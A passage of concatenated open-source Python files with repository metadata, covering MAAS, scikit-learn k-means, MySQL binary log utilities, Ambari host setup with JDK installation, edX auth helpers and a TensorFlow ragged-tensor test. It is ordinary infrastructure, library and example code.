if rsp:
sheet_url = 'https://docs.google.com/spreadsheets/d/%s/edit' % args.sheet_id
print('DONE: opening web browser to it, or see %s' % sheet_url)
webbrowser.open(sheet_url, new=1, autoraise=True)
else:
print('ERROR: could not process %r' % args.imgfile)
| googlecodelabs/analyze_gsimg | alt/analyze_gsimg-newauth.py | Python | apache-2.0 | 7,125 |
# Copyright 2012 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Django command: start a database shell.
Overrides the default implementation.
"""
from __future__ import (
absolute_import,
print_function,
unicode_literals,
)
str = None
__metaclass__ = type
__all__ = ['Command']
from django.core.management.commands import dbshell
from maasserver.testing.database import MAASClusterFixture
class Command(dbshell.Command):
"""Customized "dbshell" command."""
def handle(self, **options):
# Don't call up to Django's dbshell, because that ends up exec'ing the
# shell, preventing this from clearing down the fixture.
with MAASClusterFixture(options.get('database')) as cluster:
cluster.shell(cluster.dbname)
| cloudbase/maas | src/maasserver/management/commands/dbshell.py | Python | agpl-3.0 | 852 |
# Higgins - A multi-media server
# Copyright (c) 2007-2009 Michael Frank <msfrank@syntaxjockey.com>
#
# This program is free software; for license information see
# the COPYING file.
from higgins.logger import Loggable
class UPnPLogger(Loggable):
log_domain = "upnp"
logger = UPnPLogger()
| msfrank/Higgins | higgins/upnp/logger.py | Python | lgpl-2.1 | 296 |
"""Pluggable module registries
Copyright (C) 2014, Digium, Inc.
Kinsey Moore <kmoore@digium.com>
This program is free software, distributed under the terms of
the GNU General Public License Version 2.
"""
import logging
import re
LOGGER = logging.getLogger(__name__)
class PluggableRegistry(object):
"""Registry for pluggable modules"""
def __init__(self):
self.registry = {}
def register(self, key, factory):
"""Register a module"""
self.registry[key] = factory
def check(self, key):
"""Check whether a module factory exists for the given key"""
if key in self.registry:
return True
return False
def get_class(self, key):
"""Get the class for a module"""
return self.registry[key]
PLUGGABLE_EVENT_REGISTRY = PluggableRegistry()
PLUGGABLE_ACTION_REGISTRY = PluggableRegistry()
def var_replace(text, values):
""" perform variable replacement on text
This allows a parameters to be written to include variables from the
arbitrarily structured object provided by an ARI or AMI event like so:
from ARI to ARI: Uri: 'playbacks/{playback.id}/control'
from AMI to AMI: Channel: '{channel}'
from AMI to ARI: Uri: 'channels/{uniqueid}/play'
from ARI to AMI: Channel: '{channel.name}'
:param text: text with optional {var} entries
:param values: nested dict of values to get replacement values from
"""
if not isinstance(text, str):
return text
for match in re.findall(r'(?<!\\){[^}]*(?<!\\)}', text):
value = values
for var in match[1:-1].split('.'):
if not var in value:
LOGGER.error('Unable to replace variables in %s from %s',
text, values)
return None
value = value[var]
text = text.replace(match, value)
return text
| asterisk/testsuite | lib/python/asterisk/pluggable_registry.py | Python | gpl-2.0 | 1,893 |
DEFAULT_BOX = ('precise64', 'http://files.vagrantup.com/precise64.box') | pdiazv/minty | mt-vagrant/mt_vagrant/settings.py | Python | mit | 71 |
"""
===========================================================
A demo of K-Means clustering on the handwritten digits data
===========================================================
In this example with compare the various initialization strategies for
K-means in terms of runtime and quality of the results.
As the ground truth is known here, we also apply different cluster
quality metrics to judge the goodness of fit of the cluster labels to the
ground truth.
Cluster quality metrics evaluated (see :ref:`clustering_evaluation` for
definitions and discussions of the metrics):
=========== ========================================================
Shorthand full name
=========== ========================================================
homo homogeneity score
compl completeness score
v-meas V measure
ARI adjusted Rand index
AMI adjusted mutual information
silhouette silhouette coefficient
=========== ========================================================
"""
print(__doc__)
from time import time
import numpy as np
import matplotlib.pyplot as plt
from sklearn import metrics
from sklearn.cluster import KMeans
from sklearn.datasets import load_digits
from sklearn.decomposition import PCA
from sklearn.preprocessing import scale
np.random.seed(42)
digits = load_digits()
data = scale(digits.data)
n_samples, n_features = data.shape
n_digits = len(np.unique(digits.target))
labels = digits.target
sample_size = 300
print("n_digits: %d, \t n_samples %d, \t n_features %d"
% (n_digits, n_samples, n_features))
print(79 * '_')
print('% 9s' % 'init'
' time inertia homo compl v-meas ARI AMI silhouette')
def bench_k_means(estimator, name, data):
t0 = time()
estimator.fit(data)
print('% 9s %.2fs %i %.3f %.3f %.3f %.3f %.3f %.3f'
% (name, (time() - t0), estimator.inertia_,
metrics.homogeneity_score(labels, estimator.labels_),
metrics.completeness_score(labels, estimator.labels_),
metrics.v_measure_score(labels, estimator.labels_),
metrics.adjusted_rand_score(labels, estimator.labels_),
metrics.adjusted_mutual_info_score(labels, estimator.labels_),
metrics.silhouette_score(data, estimator.labels_,
metric='euclidean',
sample_size=sample_size)))
bench_k_means(KMeans(init='k-means++', n_clusters=n_digits, n_init=10),
name="k-means++", data=data)
bench_k_means(KMeans(init='random', n_clusters=n_digits, n_init=10),
name="random", data=data)
# in this case the seeding of the centers is deterministic, hence we run the
# kmeans algorithm only once with n_init=1
pca = PCA(n_components=n_digits).fit(data)
bench_k_means(KMeans(init=pca.components_, n_clusters=n_digits, n_init=1),
name="PCA-based",
data=data)
print(79 * '_')
###############################################################################
# Visualize the results on PCA-reduced data
reduced_data = PCA(n_components=2).fit_transform(data)
kmeans = KMeans(init='k-means++', n_clusters=n_digits, n_init=10)
kmeans.fit(reduced_data)
# Step size of the mesh. Decrease to increase the quality of the VQ.
h = .02 # point in the mesh [x_min, m_max]x[y_min, y_max].
# Plot the decision boundary. For that, we will assign a color to each
x_min, x_max = reduced_data[:, 0].min() + 1, reduced_data[:, 0].max() - 1
y_min, y_max = reduced_data[:, 1].min() + 1, reduced_data[:, 1].max() - 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))
# Obtain labels for each point in mesh. Use last trained model.
Z = kmeans.predict(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.figure(1)
plt.clf()
plt.imshow(Z, interpolation='nearest',
extent=(xx.min(), xx.max(), yy.min(), yy.max()),
cmap=plt.cm.Paired,
aspect='auto', origin='lower')
plt.plot(reduced_data[:, 0], reduced_data[:, 1], 'k.', markersize=2)
# Plot the centroids as a white X
centroids = kmeans.cluster_centers_
plt.scatter(centroids[:, 0], centroids[:, 1],
marker='x', s=169, linewidths=3,
color='w', zorder=10)
plt.title('K-means clustering on the digits dataset (PCA-reduced data)\n'
'Centroids are marked with white cross')
plt.xlim(x_min, x_max)
plt.ylim(y_min, y_max)
plt.xticks(())
plt.yticks(())
plt.show()
| soulmachine/scikit-learn | examples/cluster/plot_kmeans_digits.py | Python | bsd-3-clause | 4,526 |
"""
Utils to be used by third_party_auth app.
This helps to reduce merge conflicts.
"""
import re
from random import randrange
from django.conf import settings
def clean_username(suggested_username):
"""
Cleans the username if APPSEMBLER_FEATURES.ENABLE_THIRD_PARTY_AUTH_CLEAN_USERNAMES is set.
if the FEATURE flag ENABLE_THIRD_PARTY_AUTH_CLEAN_USERNAMES is set to
True we clean all special chars from the username, this feature is
configurable by this three env settings with this default:
TPA_CLEAN_USERNAMES_KEEP_DOMAIN_PART: false
TPA_CLEAN_USERNAMES_REPLACER_CHAR: ""
TPA_CLEAN_USERNAMES_ADD_RANDOM_INT: false
You can override this three in your settings.
"""
if settings.APPSEMBLER_FEATURES.get("ENABLE_THIRD_PARTY_AUTH_CLEAN_USERNAMES"):
if not settings.TPA_CLEAN_USERNAMES_KEEP_DOMAIN_PART:
if len(
re.findall(r'[^@]+@[^@]+\.[^@]+', suggested_username)
) > 0:
suggested_username = suggested_username.split('@')[0]
suggested_username = re.sub(
r'[^a-zA-Z0-9]',
settings.TPA_CLEAN_USERNAMES_REPLACER_CHAR,
suggested_username
)
if settings.TPA_CLEAN_USERNAMES_ADD_RANDOM_INT:
suggested_username = suggested_username[:27] if len(suggested_username) > 27 else suggested_username
suggested_username += str(randrange(100, 999))
else:
suggested_username = suggested_username[:30] if len(suggested_username) > 30 else suggested_username
return suggested_username
def get_fullname(details, default_fullname):
"""
Merges first and last name with a space if APPSEMBLER_FEATURES.ENABLE_THIRD_PARTY_AUTH_MERGE_FIRST_LAST_NAME
is true.
"""
suggester_personal_name = default_fullname
if settings.APPSEMBLER_FEATURES.get('ENABLE_THIRD_PARTY_AUTH_MERGE_FIRST_LAST_NAME', False):
suggester_personal_name = "%s %s" % (details.get('first_name', ''), details.get('last_name', ''))
return suggester_personal_name
| gymnasium/edx-platform | common/djangoapps/appsembler/third_party_auth_utils.py | Python | agpl-3.0 | 2,066 |
from enum import Enum
from collections import namedtuple
import settings
import os
import dbaccess
import urllib.request
import ast
import shutil
def move_file(filename, src, dest):
src = os.path.join(src, filename)
dest = os.path.join(dest, filename)
shutil.move(src, dest)
def create_file(filename, path):
filename = os.path.join(path, filename)
f = open(filename, 'w+')
f.close()
def delete_file(filename, path):
filename = os.path.join(path, filename)
os.remove(filename)
def delete_directory(directory):
os.rmdir(directory)
def get_problem_name(number):
url = "http://uhunt.felix-halim.net/api/p/id/{0}".format(number)
with urllib.request.urlopen(url) as response:
result = response.read()
result = ast.literal_eval(result.decode('utf-8'))
result = result["title"]
return result
class Language(Enum):
C, CPP, JAVA, PYTHON = range(4)
language_extensions = {
Language.C: 'c',
Language.CPP: 'cpp',
Language.JAVA: 'java',
Language.PYTHON: 'py'}
class Status(Enum):
TEMPORARY, WORKING, PAUSED, FINISHED, ARCHIVED = range(5)
@staticmethod
def get_directory(status):
return status.name.lower()
class ProblemData(object):
def __init__(self, problem_id, name, category_id=None):
self.problem_id = problem_id
self.name = name
self.category_id = category_id
self.language = None
self.attempt_no = None
self.status = None
self.source_file = None
self.input_file = None
self.output_file = None
def __eq__(self, other):
if other:
return self.problem_id == other.problem_id and self.attempt_no == other.attempt_no
else:
return False
def __ne__(self, other):
if other:
return other and self.problem_id != other.problem_id or self.attempt_no != other.attempt_no
else:
return True
class ProblemNotFound(Exception):
pass
class ProblemManager(object):
def __get_problem_from_db(self, problem_id):
result = dbaccess.read('problem', where={'id': problem_id})
if result:
result = result[0]
problem = ProblemData(result[0], result[1], result[2])
return problem
else:
return None
def create_files(self, problem):
path = os.path.join(settings.get('repo_path'), Status.get_directory(problem.status))
create_file(problem.source_file, path)
create_file(problem.input_file, path)
create_file(problem.output_file, path)
def create_data(self, problem):
result = dbaccess.read('problem', where={'id': problem.problem_id})
if not result:
dbaccess.insert('problem', data={'id': problem.problem_id,
'name': problem.name, 'category_id': problem.category_id})
result = dbaccess.read('problem_attempt', where={'problem_id': problem.problem_id})
attempt_no = len(result)
attempt_no += 1
dbaccess.insert('problem_attempt',
data={'problem_id': problem.problem_id, 'attempt_no': attempt_no,
'language_id': problem.language.value, 'status_id': problem.status.value})
def delete_files(self, problem):
path = os.path.join(settings.get('repo_path'), Status.get_directory(problem.status))
delete_file(problem.source_file, path)
delete_file(problem.input_file, path)
delete_file(problem.output_file, path)
def delete_data(self, problem):
dbaccess.delete('problem_attempt',
where={'problem_id': problem.problem_id,
'attempt_no': problem.attempt_no})
result = dbaccess.read('problem_attempt',
where={'problem_id': problem.problem_id})
if not result:
dbaccess.delete('problem', where={'id': problem.problem_id})
def set_status(self, status, problem):
src_dir = Status.get_directory(problem.status)
src_dir = os.path.join(settings.get('repo_path'), src_dir)
problem.status = status
dest_dir = Status.get_directory(problem.status)
dest_dir = os.path.join(settings.get('repo_path'), dest_dir)
move_file(problem.source_file, src_dir, dest_dir)
move_file(problem.input_file, src_dir, dest_dir)
move_file(problem.output_file, src_dir, dest_dir)
dbaccess.update(
'problem_attempt',
data={'status_id': problem.status.value},
where={'problem_id': problem.problem_id,
'attempt_no': problem.attempt_no})
def get_data_for_new(self, problem_id, language):
problem = self.__get_problem_from_db(problem_id)
if not problem:
name = get_problem_name(problem_id)
problem = ProblemData(problem_id, name, None)
problem.language = language
result = dbaccess.read('problem_attempt', where={'problem_id': problem_id})
problem.attempt_no = len(result) + 1
problem.status = Status.TEMPORARY
prefix = str(problem_id) + '.'
problem.source_file = prefix + language_extensions[language]
problem.input_file = prefix + 'in'
problem.output_file = prefix + 'out'
return problem
def get_data(self, problem_id, attempt_no):
problem = self.__get_problem_from_db(problem_id)
result = dbaccess.read('problem_attempt',
columns=['status_id', 'language_id'],
where={'problem_id': problem_id, 'attempt_no': attempt_no})
if not result:
message = ' '.join(['Problem:', str(problem_id), 'was not found on the database.'])
raise ProblemNotFound(message)
problem.attempt_no = attempt_no
problem.status = Status(result[0][0])
problem.language = Language(result[0][1])
prefix = str(problem_id) + '.'
problem.source_file = prefix + language_extensions[problem.language]
problem.input_file = prefix + 'in'
problem.output_file = prefix + 'out'
return problem
def update_category(self, problem):
dbaccess.update('problem', data={'category_id': problem.category_id}, where={'id': problem.problem_id})
| thyagostall/apollo | src/problem.py | Python | mit | 6,320 |
#
# Copyright (c) 2014, Oracle and/or its affiliates. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
"""
This file contains common features to manage and handle binary log files.
"""
import io
import errno
import os
import shutil
import time
from datetime import datetime
from mysql.utilities.exception import UtilError
LOG_TYPES = ['bin', 'relay', 'all']
LOG_TYPE_BIN = LOG_TYPES[0]
LOG_TYPE_RELAY = LOG_TYPES[1]
LOG_TYPE_ALL = LOG_TYPES[2]
_DAY_IN_SECONDS = 86400
def is_binary_log_filename(filename, log_type=LOG_TYPE_ALL, basename=None):
"""Check if the filename matches the name format for binary log files.
This function checks if the given filename corresponds to the filename
format of known binary log files, according to the specified log_type and
optional basename. The file extension is a sequence number (.nnnnnn). If
a basename is given then the filename for the binary log file must have
the format 'basename.nnnnnn'. Otherwise the default filename is assumed,
depending on the log_type: '*-bin.nnnnnn' for the 'bin' log type,
'*-relay-bin.nnnnnn' for the 'relay' log type, and both for the 'all' type.
filename[in] Filename to check.
log_type[in] Type of the binary log, must be one of the following
values: 'bin' for binlog files, 'relay' for relay log
files, 'all' for both binary log files. By default = 'all'.
basename[in] Basename defined for the binary log file. None by default,
meaning that the default server name formats are assumed
(according to the given log type).
"""
# Split file basename and extension.
f_base, f_ext = os.path.splitext(filename)
f_ext = f_ext[1:] # remove starting dot '.'
# Check file basename.
if basename:
if f_base != basename:
# Defined basename does not match.
return False
else:
# Check default serve basename for the given log_type.
if log_type == LOG_TYPE_BIN:
# *-bin.nnnnnn (excluding *-relay-bin.nnnnnn)
if not f_base.endswith('-bin') or f_base.endswith('-relay-bin'):
return False
elif log_type == LOG_TYPE_RELAY:
# *-relay-bin.nnnnnn
if not f_base.endswith('-relay-bin'):
return False
elif log_type == LOG_TYPE_ALL:
# *-bin.nnnnnn (including *-relay-bin.nnnnnn)
if not f_base.endswith('-bin'):
return False
else:
raise UtilError("Unsupported log-type: {0}".format(log_type))
# Check file extension.
try:
int(f_ext)
except ValueError:
# Extension is not a sequence number (error converting to integer).
return False
# Return true if basename and extension checks passed.
return True
def get_index_file(source, binary_log_file):
""" Find the binary log index file.
Search the index file in the specified source directory for the given
binary log file and retrieve its location (i.e., full path).
source[in] Source directory to search for the index file.
binary_log_file[in] Binary log file associated to the index file.
Return the location (full path) of the binary log index file.
"""
f_base, _ = os.path.splitext(binary_log_file)
index_filename = '{0}.index'.format(f_base)
index_file = os.path.join(source, index_filename)
if os.path.isfile(index_file):
return index_file
else:
raise UtilError("Unable to find the index file associated to file "
"'{0}'.".format(binary_log_file))
def filter_binary_logs_by_sequence(filenames, seq_list):
"""Filter filenames according to the given sequence number list.
This function filters the given list of filenames according to the given
sequence number list, excluding the filenames that do not match.
Note: It is assumed that given filenames are valid binary log files.
Use is_binary_log_filename() to check each filenames.
filenames[in] List of binary log filenames to check.
seq_list[in] List of allowed sequence numbers or intervals.
For example: 3,5-12,16,21.
Returns a list of the filenames matching the given sequence number filter.
"""
res_list = []
for filename in filenames:
# Split file basename and extension.
_, f_ext = os.path.splitext(filename)
f_ext = int(f_ext[1:]) # remove starting dot '.' and convert to int
for seq_value in seq_list:
# Check if the sequence value is an interval (tuple) or int.
if isinstance(seq_value, tuple):
# It is an interval; Check if it contains the file sequence
# number.
if seq_value[0] <= f_ext <= seq_value[1]:
res_list.append(filename)
break
else:
# Directly check if the sequence numbers match (are equal).
if f_ext == seq_value:
res_list.append(filename)
break
# Retrieve the resulting filename list (filtered by sequence number).
return res_list
def filter_binary_logs_by_date(filenames, source, max_date):
"""Filter filenames according their last modification date.
This function filters the given list of files according to their last
modification date, excluding those with the last change before the given
max_date.
Note: It is assumed that given filenames are valid binary log files.
Use is_binary_log_filename() to check each filename.
filenames[in] List of binary log filenames to check.
source[in] Source directory where the files are located.
max_date[in] Maximum modification date, in the format 'yyyy-mm-dd' or
'yyyy-mm-ddThh:mm:ss', or number of days since the last
modification.
Returns a list of the filenames not changed within the given elapsed days
(i.e., recently changed files will be excluded).
"""
res_list = []
# Compute maximum modified date/time, according to supported formats.
try:
elapsed_days = int(max_date)
except ValueError:
# Max date is not a valid integer (i.e., number of days).
elapsed_days = None
if elapsed_days: # Process the specified number fo days
if elapsed_days < 1:
raise UtilError(
"Invalid number of days (must be an integer greater than "
"zero): {0}".format(max_date)
)
# Get current local time.
ct_tuple = time.localtime()
# Set time to 00:00:00.
ct_list = list(ct_tuple)
ct_list[3] = 0 # hours
ct_list[4] = 0 # minutes
ct_list[5] = 0 # seconds
ct_tuple_0000 = tuple(ct_list)
# Get seconds since epoch for the current day at 00:00.
day_start_time = time.mktime(ct_tuple_0000)
# Compute max modified date based on elapsed days ignoring time, i.e.,
# 00:00 is used as reference to count days. Current day count as one.
max_time = day_start_time - (_DAY_IN_SECONDS * (elapsed_days - 1))
max_date = time.strftime('%Y-%m-%dT%H:%M:%S', time.localtime(max_time))
else: # Process the specified date
# Check the date format.
_, _, time_val = max_date.partition('T')
if time_val:
try:
dt_max_date = datetime.strptime(max_date, '%Y-%m-%dT%H:%M:%S')
except ValueError:
raise UtilError(
"Invalid date/time format (yyyy-mm-ddThh:mm:ss): "
"{0}".format(max_date)
)
else:
try:
dt_max_date = datetime.strptime(max_date, '%Y-%m-%d')
except ValueError:
raise UtilError(
"Invalid date format (yyyy-mm-dd): {0}".format(max_date)
)
max_date = dt_max_date.strftime('%Y-%m-%dT%H:%M:%S')
# Check modified date for each file.
for filename in filenames:
source_file = os.path.join(source, filename)
modified_time = os.path.getmtime(source_file)
modified_date = time.strftime('%Y-%m-%dT%H:%M:%S',
time.localtime(modified_time))
if modified_date < max_date:
res_list.append(filename)
# Retrieve the resulting filename list (filtered by modified date).
return res_list
def move_binary_log(source, destination, filename, log_index,
undo_on_error=True):
"""Move a binary log file to a specific destination.
This method move the given binary log file (filename), located in the
source directory, to the specified destination directory and updates the
respective index file accordingly.
Note: An error is raised if any issue occurs during the process.
Additionally, if the undo_on_error=True (default) then the file is moved
back to the source directory if an error occurred while updating the index
file (keeping the file in the original location and the index file
unchanged). Otherwise the file might be moved and the index file not
correctly updated. In either cases an error is issued.
source[in] Source directory where the binary log file is located.
destination[in] Destination directory to move the binary log.
filename[in] Name of the binary log file to move.
log_index[in] Location (full path) of the binary log index file.
undo_on_error[in] Flag to undo the file move if an error occurs (when
updating the index file) or not. By default = True,
meaning that the move operation is reverted ().
"""
def _move_file_back():
"""Try to move the file back to its original source directory.
Returns a warning message indicating if the file was moved back
successfully or not.
"""
try:
# Move file back to source directory.
destination_file = os.path.join(destination, filename)
shutil.move(destination_file, source)
except (IOError, shutil.Error) as move_err:
# Warn the user that an error occurred while trying to
# move the file back.
return ("\nWARNING: Failed to move file back to source directory: "
"{0}").format(move_err)
else:
# Notify user that the file was successfully moved back.
return "\nWARNING: File move aborted."
# Move file to destination directory.
source_file = os.path.join(source, filename)
if os.path.isdir(destination):
shutil.move(source_file, destination)
else:
# Raise an error if the destination dir does not exist.
# Note: To be consistent with the IOError raised by shutil.move() if
# the source file does not exist.
raise IOError(errno.ENOENT, "No such destination directory",
destination)
# Update index file.
found_pos = None
try:
with io.open(log_index, 'r') as index_file:
# Read all data from index file.
data = index_file.readlines()
# Search for the binary log file entry.
for pos, line in enumerate(data):
if line.strip().endswith(filename):
found_pos = pos
break
if found_pos is not None:
# Replace binary file entry with absolute destination path.
data[found_pos] = u'{0}\n'.format(
os.path.join(destination, filename)
)
else:
warning = "" # No warning if undo_on_error = False.
if undo_on_error:
warning = _move_file_back()
# Raise error (including cause).
raise UtilError("Entry for file '{0}' not found in index "
"file: {1}{2}".format(filename, log_index,
warning))
# Create a new temporary index_file with the update entry.
# Note: original file is safe is something goes wrong during write.
tmp_file = '{0}.tmp'.format(log_index)
try:
with io.open(tmp_file, 'w', newline='\n') as tmp_index_file:
tmp_index_file.writelines(data)
except IOError as err:
warning = "" # No warning if undo_on_error = False.
if undo_on_error:
warning = _move_file_back()
# Raise error (including cause).
raise UtilError('Unable to write temporary index file: '
'{0}{1}'.format(err, warning))
except IOError as err:
warning = "" # No warning if undo_on_error = False.
if undo_on_error:
warning = _move_file_back()
# Raise error (including cause).
raise UtilError('Failed to update index file: '
'{0}{1}'.format(err, warning))
# Replace the original index file with the new one.
if os.name == 'posix':
os.rename(tmp_file, log_index)
else:
# On windows, rename does not work if the target file already exists.
shutil.move(tmp_file, log_index)
| ioggstream/mysql-utilities | mysql/utilities/common/binary_log_file.py | Python | gpl-2.0 | 14,122 |
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import re
import getpass
from copy import copy
from resource_management.libraries.functions.version import compare_versions
from resource_management import *
def setup_users():
"""
Creates users before cluster installation
"""
import params
if not params.host_sys_prepped and not params.ignore_groupsusers_create:
for group in params.group_list:
Group(group,
)
for user in params.user_list:
if params.override_uid == "true":
User(user,
uid = get_uid(user),
gid = params.user_to_gid_dict[user],
groups = params.user_to_groups_dict[user],
)
else:
User(user,
gid = params.user_to_gid_dict[user],
groups = params.user_to_groups_dict[user],
)
if params.override_uid == "true":
set_uid(params.smoke_user, params.smoke_user_dirs)
else:
Logger.info('Skipping setting uid for smoke user as host is sys prepped')
else:
Logger.info('Skipping creation of User and Group as host is sys prepped or ignore_groupsusers_create flag is on')
pass
if params.has_hbase_masters:
Directory (params.hbase_tmp_dir,
owner = params.hbase_user,
mode=0775,
create_parents = True,
cd_access="a",
)
if not params.host_sys_prepped and params.override_uid == "true":
set_uid(params.hbase_user, params.hbase_user_dirs)
else:
Logger.info('Skipping setting uid for hbase user as host is sys prepped')
pass
if not params.host_sys_prepped:
if params.has_namenode:
create_dfs_cluster_admins()
else:
Logger.info('Skipping setting dfs cluster admin as host is sys prepped')
def create_dfs_cluster_admins():
"""
dfs.cluster.administrators support format <comma-delimited list of usernames><space><comma-delimited list of group names>
"""
import params
groups_list = create_users_and_groups(params.dfs_cluster_administrators_group)
User(params.hdfs_user,
groups = params.user_to_groups_dict[params.hdfs_user] + groups_list,
ignore_failures = params.ignore_groupsusers_create
)
def create_users_and_groups(user_and_groups):
import params
parts = re.split('\s', user_and_groups)
if len(parts) == 1:
parts.append("")
users_list = parts[0].split(",") if parts[0] else []
groups_list = parts[1].split(",") if parts[1] else []
if users_list:
User(users_list,
ignore_failures = params.ignore_groupsusers_create
)
if groups_list:
Group(copy(groups_list),
ignore_failures = params.ignore_groupsusers_create
)
return groups_list
def set_uid(user, user_dirs):
"""
user_dirs - comma separated directories
"""
import params
File(format("{tmp_dir}/changeUid.sh"),
content=StaticFile("changeToSecureUid.sh"),
mode=0555)
ignore_groupsusers_create_str = str(params.ignore_groupsusers_create).lower()
uid = get_uid(user)
Execute(format("{tmp_dir}/changeUid.sh {user} {user_dirs} {uid}"),
not_if = format("(test $(id -u {user}) -gt 1000) || ({ignore_groupsusers_create_str})"))
def get_uid(user):
import params
import commands
user_str = str(user) + "_uid"
service_env = [ serviceEnv for serviceEnv in params.config['configurations'] if user_str in params.config['configurations'][serviceEnv]]
if service_env and params.config['configurations'][service_env[0]][user_str]:
service_env_str = str(service_env[0])
uid = params.config['configurations'][service_env_str][user_str]
if len(service_env) > 1:
Logger.warning("Multiple values found for %s, using %s" % (user_str, uid))
return uid
else:
if user == params.smoke_user:
return 0
File(format("{tmp_dir}/changeUid.sh"),
content=StaticFile("changeToSecureUid.sh"),
mode=0555)
ignore_groupsusers_create_str = str(params.ignore_groupsusers_create).lower()
newUid=commands.getoutput(format("{tmp_dir}/changeUid.sh {user}"))
return int(newUid)
def setup_hadoop_env():
import params
if params.has_namenode:
if params.security_enabled:
tc_owner = "root"
else:
tc_owner = params.hdfs_user
Directory(params.hadoop_dir, mode=0755)
# IOP < 4.0 used a conf -> conf.empty symlink for /etc/hadoop/
if Script.is_stack_less_than("4.0"):
Directory(params.hadoop_conf_empty_dir,
create_parents = True,
owner = 'root',
group = params.user_group
)
Link(params.hadoop_conf_dir,
to=params.hadoop_conf_empty_dir,
not_if=format("ls {hadoop_conf_dir}")
)
# write out hadoop-env.sh, but only if the directory exists
if os.path.exists(params.hadoop_conf_dir):
File(os.path.join(params.hadoop_conf_dir, 'hadoop-env.sh'),
owner=tc_owner, group=params.user_group,
content=InlineTemplate(params.hadoop_env_sh_template)
)
# Create tmp dir for java.io.tmpdir
# Handle a situation when /tmp is set to noexec
Directory(params.hadoop_java_io_tmpdir,
owner=params.hdfs_user,
group=params.user_group,
mode=0777
)
def setup_java():
"""
Installs jdk using specific params, that comes from ambari-server
"""
import params
java_exec = format("{java_home}/bin/java")
if not os.path.isfile(java_exec):
jdk_curl_target = format("{tmp_dir}/{jdk_name}")
java_dir = os.path.dirname(params.java_home)
tmp_java_dir = format("{tmp_dir}/jdk")
if not params.jdk_name:
return
Directory(params.artifact_dir,
create_parents = True,
)
File(jdk_curl_target,
content = DownloadSource(format("{jdk_location}/{jdk_name}")),
not_if = format("test -f {jdk_curl_target}")
)
if params.jdk_name.endswith(".bin"):
chmod_cmd = ("chmod", "+x", jdk_curl_target)
install_cmd = format("mkdir -p {tmp_java_dir} && cd {tmp_java_dir} && echo A | {jdk_curl_target} -noregister && {sudo} cp -rp {tmp_java_dir}/* {java_dir}")
elif params.jdk_name.endswith(".gz"):
chmod_cmd = ("chmod","a+x", java_dir)
install_cmd = format("mkdir -p {tmp_java_dir} && cd {tmp_java_dir} && tar -xf {jdk_curl_target} && {sudo} cp -rp {tmp_java_dir}/* {java_dir}")
Directory(java_dir
)
Execute(chmod_cmd,
sudo = True,
)
Execute(install_cmd,
)
File(format("{java_home}/bin/java"),
mode=0755,
cd_access="a",
)
Execute(("chgrp","-R", params.user_group, params.java_home),
sudo = True,
)
Execute(("chown","-R", getpass.getuser(), params.java_home),
sudo = True,
)
| arenadata/ambari | ambari-server/src/main/resources/stacks/BigInsights/4.0/hooks/before-ANY/scripts/shared_initialization.py | Python | apache-2.0 | 7,546 |
from bin.main import Main
import os
if __name__ == "__main__":
absolute_path = os.path.abspath(__file__)
directory = os.path.dirname(absolute_path)
os.chdir(directory)
Main().run()
| rCorvidae/OrionPI | src/OrionPI.py | Python | mit | 200 |
import _plotly_utils.basevalidators
class AlignsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="alignsrc", parent_name="pointcloud.hoverlabel", **kwargs
):
super(AlignsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
| plotly/python-api | packages/python/plotly/plotly/validators/pointcloud/hoverlabel/_alignsrc.py | Python | mit | 469 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests that ragged tensors work with GPU, such as placement of int and string.
Test using ragged tensors with map_fn and distributed dataset. Since GPU does
not support strings, ragged tensors containing string should always be placed
on CPU.
"""
from absl.testing import parameterized
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import multi_device_iterator_ops
from tensorflow.python.distribute import mirrored_strategy
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import map_fn
from tensorflow.python.ops.ragged import ragged_factory_ops
from tensorflow.python.platform import test
def ragged_int64():
return ragged_factory_ops.constant(
[
[3, 1, 4, 1],
[],
[5, 9, 2],
[6],
[],
[3, 1, 4, 1],
[3, 1],
[2, 1, 4, 1],
],
dtype=dtypes.int64,
)
def ragged_str():
return ragged_factory_ops.constant([
['3', '1', '4', '1'],
[],
['5', '9', '2'],
['6'],
[],
['3', '1', '4', '1'],
['3', '1'],
['2', '1', '4', '1'],
])
def dense_str():
return constant_op.constant([
['3', '1', '4', '1'],
['1', '2', '4', '1'],
['2', '3', '4', '1'],
['7', '4', '4', '1'],
['9', '5', '4', '1'],
['6', '6', '4', '1'],
['4', '7', '4', '1'],
